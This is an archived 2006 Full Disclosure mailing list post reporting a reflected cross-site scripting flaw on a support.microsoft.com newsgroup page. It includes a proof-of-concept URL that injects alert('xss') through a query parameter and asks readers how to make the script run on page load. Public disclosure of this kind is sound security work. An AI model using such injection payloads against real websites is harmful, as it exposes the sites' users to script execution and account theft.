Full Disclosure mailing list archives
micosoft.com xss
From: "Thomas Pollet" <thomas.pollet () gmail com>
Date: Mon, 7 Aug 2006 21:02:02 +0200
Hello, I have found that microsoft.com fails to filter html properly on some pages. http://support.microsoft.com/newsgroups/default.aspx?lang=en&cr=US&dg=microsoft.public.ccf&sloc=us');alert('xss<http://support.microsoft.com/newsgroups/default.aspx?lang=en&cr=US&dg=microsoft.public.ccf&sloc=us%27%29;alert%28%27xss> this causes javascript to be executed when a user clicks the help link. Someone knows how to get js executed on page load? greets, Thomas
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- micosoft.com xss Thomas Pollet (Aug 07)
- <Possible follow-ups>
- Re: Re: micosoft.com xss Mad World (Aug 07)
- Re: Re: micosoft.com xss Thomas Pollet (Aug 08)
- Re: Re: micosoft.com xss Mad World (Aug 08)
- Re: Re: micosoft.com xss Mad World (Aug 08)
- Re: Re: micosoft.com xss Thomas Pollet (Aug 08)